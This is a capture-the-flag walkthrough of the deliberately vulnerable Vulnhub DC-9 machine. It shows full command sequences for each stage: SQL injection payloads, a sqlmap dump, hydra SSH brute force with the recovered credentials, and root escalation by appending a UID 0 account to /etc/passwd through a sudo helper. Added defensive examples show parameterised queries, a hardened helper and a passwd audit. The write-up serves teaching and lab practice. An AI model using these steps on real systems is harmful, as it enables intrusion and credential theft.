Vulnhub DC-9 Writeup

Recon

First, locate the target with netdiscover; its IP address is 192.168.244.135.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.244.0/24
 Currently scanning: 192.168.244.0/24   |   Screen View: Unique Hosts                                                        
 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.244.1   00:50:56:c0:00:08      1      60  VMware, Inc.                                                              
 192.168.244.2   00:50:56:f7:b2:38      1      60  VMware, Inc.                                                              
 192.168.244.135 00:0c:29:e4:f7:0d      1      60  VMware, Inc.                                                              
 192.168.244.254 00:50:56:ed:d6:50      1      60  VMware, Inc.   

Next, scan the target with Nmap: port 22 is filtered and port 80 is open (a FIN scan can only report it as open|filtered).

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sF 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 04:04 EST
Nmap scan report for 192.168.244.135
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp filtered      ssh
80/tcp open|filtered http
MAC Address: 00:0C:29:E4:F7:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

SQL Injection

Browse to the web service.


Test the Search form for SQL injection.


Use ORDER BY to guess the number of columns: the query returns 6 columns.


Confirm the column count with UNION SELECT.


Retrieve the database name and the database version.


List the tables in the current database.

Fred' union select 1,2,3,4,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#

Read the table's columns.

Fred' union select 1,2,3,4,5,group_concat(UserID,Username,Password) from Staff.Users;#

With the usernames and password hashes in hand, crack the hashes and log in on the web interface.

Credentials: admin:transorbital1
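The Search form is injectable because the search term is spliced straight into the SQL text. The following is an added example, not the DC-9 application's code: a small SQLite model of that lookup with the concatenated query beside a parameterised one. The table layout, the names, and the placeholder password value are constructed, and the UNION payload from above is adapted to SQLite comment syntax (`--` instead of `#`).

```python
import sqlite3

# Constructed sample data standing in for the Staff database on DC-9.
# The password value is a placeholder, not a real hash from the box.
STAFF = [
    ("Alice", "Example", "Marketing", "1234567891", "alice@example.invalid", "note"),
    ("Fred", "Example", "IT", "1234567892", "fred@example.invalid", "note"),
]
USERS = [(1, "admin", "md5-placeholder-0001")]

# The injection payload from the writeup, rewritten for SQLite ('--' comment).
PAYLOAD = "Fred' UNION SELECT 1,2,3,4,Username,Password FROM Users--"


def build_db():
    """Create an in-memory database with the two sample tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE StaffDetails(firstname, lastname, position, phone, email, notes);"
        "CREATE TABLE Users(UserID INTEGER, Username TEXT, Password TEXT);"
    )
    conn.executemany("INSERT INTO StaffDetails VALUES (?,?,?,?,?,?)", STAFF)
    conn.executemany("INSERT INTO Users VALUES (?,?,?)", USERS)
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """String concatenation: the term becomes part of the SQL statement itself."""
    sql = (
        "SELECT firstname, lastname, position, phone, email, notes FROM StaffDetails "
        f"WHERE firstname LIKE '%{term}%' OR lastname LIKE '%{term}%'"
    )
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Parameterised query: the term is bound as a value and cannot alter the statement."""
    sql = (
        "SELECT firstname, lastname, position, phone, email, notes FROM StaffDetails "
        "WHERE firstname LIKE ? OR lastname LIKE ?"
    )
    pattern = f"%{term}%"
    return conn.execute(sql, (pattern, pattern)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))  # leaks the Users row
    print("safe:      ", search_safe(db, PAYLOAD))        # no rows: nobody is named like the payload
```

With the concatenated query the payload's UNION appends the `Users` row to the result set, which is exactly what the `Fred' union select ...` requests above do against the real box; the parameterised version treats the whole payload as a name to look for and returns nothing.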

The "File does not exist" message on the Manage page suggests a file inclusion vulnerability, so we fuzz the parameter with Burp Suite.

Note that the payload must not be URL-encoded when the request is sent.

We now have usernames, but the SSH port is not open. Under /etc we find /etc/knockd.conf: knockd controls opening and closing of the SSH port, and according to its configuration the port only opens after the listed ports are hit in the right order.


From the configuration file, connecting to ports 7469, 8475 and 9842 in that order opens the SSH port. Either nc or nmap can be used to knock.

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 7469
(UNKNOWN) [192.168.244.135] 7469 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 8475
(UNKNOWN) [192.168.244.135] 8475 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 9842
(UNKNOWN) [192.168.244.135] 9842 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p22 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 06:20 EST
Nmap scan report for 192.168.244.135
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Brute Force

SSH is now open, but we have no SSH username or password. We use sqlmap to dump the database contents and then brute-force SSH with them. First, save the HTTP request for the injection point to a file.

POST /results.php HTTP/1.1
Host: 192.168.244.135
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.244.135
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.244.135/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

search=%27or+1%3D1%23

Then dump the table with the following command.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ sqlmap -r inject.txt -D users -T UserDetails --dump  
······

[06:54:44] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv'

Next, split the dump into username and password lists and brute-force SSH.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ mv /home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv ./user.txt

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "3" > passwd.lst

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "5" > user.lst  

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P passwd.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 06:57:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.244.135   login: janitor   password: Ilovepeepee
[STATUS] 341.00 tries/min, 341 tries in 00:01h, 21 to do in 00:01h, 15 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 06:58:08

With these passwords we log in and look for a way to escalate. None of the three accounts has sudo rights, but janitor's home directory contains a hidden directory.

janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  5 21:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  5 21:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

We run the brute force again with these passwords.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P newpass.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 07:06:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 07:06:27

Check sudo -l.

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

Go up from the executable's directory and read the source of test.py.

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

From the source, the program expects three arguments (counting the script name): it reads the file named by the second and appends its contents to the file named by the third. Since it runs as root via sudo, we can append a UID 0 user to /etc/passwd and escalate. First we use the program to read /etc/shadow and pick a user whose password we already know.
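The root cause is that the helper takes arbitrary source and destination paths while running as root. The following is an added example and not the box's code: a hardened rewrite of the same copy-and-append helper that resolves symlinks and `..` with `os.path.realpath` and refuses any path outside an allow-listed directory. The directory `/opt/devstuff/data` is an assumption chosen for illustration.

```python
#!/usr/bin/env python3
"""Hardened copy-and-append helper (added example; the allow-listed root is assumed)."""
import os
import sys

# Assumed allow-list: the only tree this helper may read from or append to.
ALLOWED_ROOT = "/opt/devstuff/data"


def is_confined(path, root=ALLOWED_ROOT):
    """True if the fully resolved path lies inside root (symlinks and '..' resolved)."""
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(path)
    return real_path == real_root or real_path.startswith(real_root + os.sep)


def safe_append(src, dst, root=ALLOWED_ROOT):
    """Append src to dst only when both resolve inside root; raise PermissionError otherwise.

    Returns the number of bytes appended.
    """
    if not is_confined(src, root):
        raise PermissionError(f"source outside {root}: {src}")
    if not is_confined(dst, root):
        raise PermissionError(f"destination outside {root}: {dst}")
    with open(src, "rb") as f_in:
        data = f_in.read()
    # O_NOFOLLOW on the final component: a symlink planted at dst between the
    # check and the open fails to open instead of redirecting the write.
    nofollow = getattr(os, "O_NOFOLLOW", 0)
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | nofollow
    fd = os.open(dst, flags, 0o640)
    with os.fdopen(fd, "ab") as f_out:
        f_out.write(data)
    return len(data)


def main(argv):
    if len(argv) != 3:
        print("Usage: test.py read append", file=sys.stderr)
        return 1
    try:
        n = safe_append(argv[1], argv[2])
    except (PermissionError, OSError) as exc:
        print(f"refused: {exc}", file=sys.stderr)
        return 1
    print(f"appended {n} bytes")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

With this version, `sudo test /etc/shadow ./shadow` and `sudo test /tmp/test /etc/passwd` are both refused before any file is opened, and a symlink inside the allowed directory that points at `/etc/shadow` is refused as well because `realpath` follows it. A race between the check and the open of the source file is still possible in principle, so the allowed directory should not be writable by the users permitted to run the helper.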

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /etc/shadow ./shadow
fredf@dc-9:/opt/devstuff$ cat shadow 
······
janitor:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:18259:0:99999:7:::

We rewrite that entry as shown below and save it to /tmp/test.

hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash

Then write it into /etc/passwd with the test program (use single quotes so the shell does not expand the $ characters in the hash) and su to the new user to escalate (janitor's password is the one to enter here).

fredf@dc-9:/opt/devstuff$ echo 'hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash' > /tmp/test

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/test /etc/passwd

fredf@dc-9:/opt/devstuff$ su hacker

After escalating, we obtain the FLAG.
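The appended account has two properties a defender can spot in a single pass over /etc/passwd: its UID is 0 although its name is not root, and its password hash lives in /etc/passwd instead of /etc/shadow. The following is an added example, not part of the writeup: a small audit routine over a constructed passwd sample in which the `hacker` line uses a placeholder hash rather than a real one.

```python
"""Added example: audit /etc/passwd for entries like the one appended above."""

# Constructed sample; the hash on the 'hacker' line is a placeholder, not a real credential.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
janitor:x:1005:1005:,,,:/home/janitor:/bin/bash
fredf:x:1009:1009:,,,:/home/fredf:/bin/bash
hacker:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
broken line without enough fields
"""

REASON_UID0 = "UID 0 account other than root"
REASON_HASH = "password field is not 'x': hash or empty password kept in /etc/passwd"
REASON_MALFORMED = "malformed entry (expected 7 colon-separated fields)"


def parse_passwd(text):
    """Yield (line_number, fields) for each non-empty, non-comment line."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line and not line.startswith("#"):
            yield lineno, line.split(":")


def audit_passwd(text):
    """Return a list of (line_number, account_name, reason) findings."""
    findings = []
    for lineno, fields in parse_passwd(text):
        if len(fields) != 7:
            findings.append((lineno, fields[0], REASON_MALFORMED))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        # Debian keeps every hash in /etc/shadow, so anything but 'x' here is suspicious.
        # '*' is tolerated because some systems use it for locked system accounts.
        if pw not in ("x", "*"):
            findings.append((lineno, name, REASON_HASH))
        try:
            uid_value = int(uid)
        except ValueError:
            findings.append((lineno, name, REASON_MALFORMED))
            continue
        if uid_value == 0 and name != "root":
            findings.append((lineno, name, REASON_UID0))
    return findings


if __name__ == "__main__":
    for lineno, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {reason}")
```

Running the audit on a live system (`audit_passwd(open("/etc/passwd").read())`) flags only the appended account and any damaged lines; the stock root, daemon and user entries produce no findings. Pairing this with file-integrity monitoring on /etc/passwd and /etc/shadow, and with a review of NOPASSWD sudo rules that hand root to arbitrary-path file helpers like test.py, covers both sides of the chain used above.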

